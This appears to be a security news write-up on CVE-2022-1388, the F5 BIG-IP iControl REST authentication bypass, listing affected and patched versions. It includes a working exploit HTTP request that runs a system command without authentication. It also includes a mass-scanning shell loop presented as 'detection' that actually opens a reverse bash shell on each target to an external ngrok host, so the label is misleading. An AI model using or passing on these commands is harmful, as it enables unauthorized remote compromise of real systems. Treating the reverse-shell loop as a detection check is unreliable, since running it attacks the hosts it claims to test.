Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388, affecting F5 BIG-IP. On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControl REST component of its BIG-IP product with a CVSSv3 base score of 9.8.

Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This could range anywhere from deploying cryptocurrency miners to dropping web shells for follow-on attacks, such as information theft and ransomware.

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.” reads the advisory published by the vendor.”

What is F5 BIG-IP?

A blend of software and hardware that’s a load balancer and a full proxy. It gives you the ability to control the traffic that passes through the network. F5 BIG-IP is most often found in the United States and in the Hospital & Health Care industry.

The flaw affects the following versions:

16.1.0 – 16.1.2
15.1.0 – 15.1.5
14.1.0 – 14.1.4
13.1.0 – 13.1.4
12.1.0 – 12.1.6
11.6.1 – 11.6.5

How to detect CVE-2022-1388?

For organizations looking to understand if their F5 BIG-IP instances are vulnerable to exploitation, a bash one-liner is released, it can run to determine if a specific instance of BIG-IP is exploitable.

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
Content-type: application/json
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 42
{"command": "run", "utilCmdArgs": "-c id"}

Vulnerability detection against a URL.

$ python CVE-2022-1388.py -u https://192.168.2.110
[+] https://192.168.2.110 is vulnerable!!!

One liner code to find F5 BIG-IP RCE

cat url.txt | while read ip; do curl -sk –max-time 2 -H “Content-Type: application/json” “https://$ip/mgmt/tm/util/bash” -d ‘{“command”:”run”,”utilCmdArgs”:”-c ‘exec bash -i &>/dev/tcp/0.tcp.ngrok.io/14717<&1′”}’;done

Mitigation Guidance

We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:

  • 17.0.0
  • 16.1.2.2
  • 15.1.5.1
  • 14.1.4.6
  • 13.1.5